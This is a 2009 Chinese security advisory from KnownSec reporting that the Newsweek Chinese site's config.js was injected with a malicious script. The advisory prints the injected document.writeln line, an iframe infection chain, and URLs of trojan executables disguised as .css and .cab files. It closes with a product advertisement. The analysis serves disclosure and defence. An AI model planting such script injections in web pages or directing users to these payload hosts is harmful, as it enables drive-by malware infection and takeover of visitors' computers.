发布时间:Fri Jan 23 2009 09:37:34 UTC+0800
最后更新时间:Fri Jan 23 2009 09:37:34 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 新闻周刊中文网(http://www.newsweekchinese.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://www.newsweekchinese.com/data/js/config.js
在脚本文件中被嵌入一段恶意链接代码:

document.writeln(”<script src=http:\/\/52-o.cn\/games.gif><\/script>”);
挂马分析:
[wide]http://www.newsweekchinese.com/
[script]http://www.newsweekchinese.com//data/js/config.js
[script]http://52-o.cn/games.gif
[frame]http://alnnama.3322.org/b057850/b05.htm
[frame]http://alnnama.3322.org/b057850/new.html
[frame]http://alnnama.3322.org/b057850/../as.htm
[exe]http://qq.18i16.net/exe1/ce.css
[frame]http://alnnama.3322.org/b057850/../14.htm
[exe]http://qq.18i16.net/exe1/ms.css
[frame]http://alnnama.3322.org/b057850/lzz.htm
[exe]http://qq.18i16.net/exe1/b05.css
[frame]http://alnnama.3322.org/b057850/../bfyy.htm
[exe]http://qq.18i16.net/exe1/bf.css
[frame]http://alnnama.3322.org/b057850/../real10.htm
[exe]http://qq.18i16.net/exe1/re.css
[frame]http://alnnama.3322.org/b057850/real11.htm
[exe]http://qq.18i16.net/exe1/b05.css
[frame]http://alnnama.3322.org/b057850/fx.htm
[frame]http://alnnama.3322.org/b057850/../cx.htm
[exe]http://121.12.173.218/exe1/cx.css
[exe]http://qq.18i16.net/sina.css
[cab]http://qq.18i16.net/baidu.cab
[frame]http://aaddka.3322.org/tj/b05.htm
[script]http://js.tongji.cn.yahoo.com/859818/ystat.js
[script]http://s23.cnzz.com/stat.php?id=1138895&web_id=1138895
[script]http://www.newsweekchinese.com//include/js/common.js
[script]http://www.newsweekchinese.com//include/js/prototype.js
[script]http://www.newsweekchinese.com//member/login.php?action=js
[script]http://www.newsweekchinese.com//include/js/time.js
[script]http://www.newsweekchinese.com//member/login.php?action=js
[script]http://www.newsweekchinese.com//data/js/search.js
[script]http://www.newsweekchinese.com//data/newsweek.php?id=1
[script]http://www.newsweekchinese.com//data/newsweek.php?id=18
[script]http://www.newsweekchinese.com//data/newsweek.php?id=11
[script]http://www.newsweekchinese.com//data/newsweek.php?id=12
[script]http://www.newsweekchinese.com//data/newsweek.php?id=13
[script]http://www.newsweekchinese.com//stat/stat.php
[script]http://js.tongji.cn.yahoo.com/839252/ystat.js
[cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
[cab]http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
最终下载病毒文件:
http://qq.18i16.net/exe1/ce.css
http://qq.18i16.net/exe1/ms.css
http://qq.18i16.net/exe1/b16.css
http://qq.18i16.net/exe1/bf.css
http://qq.18i16.net/exe1/re.css
http://121.12.173.218/exe1/cx.css
http://qq.18i16.net/sina.css
http://qq.18i16.net/baidu.cab
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。
欢迎使用针对此类挂马攻击的防护程序-365门神,
可到www.365menshen.com下载并试用。
Popularity: 7% [?]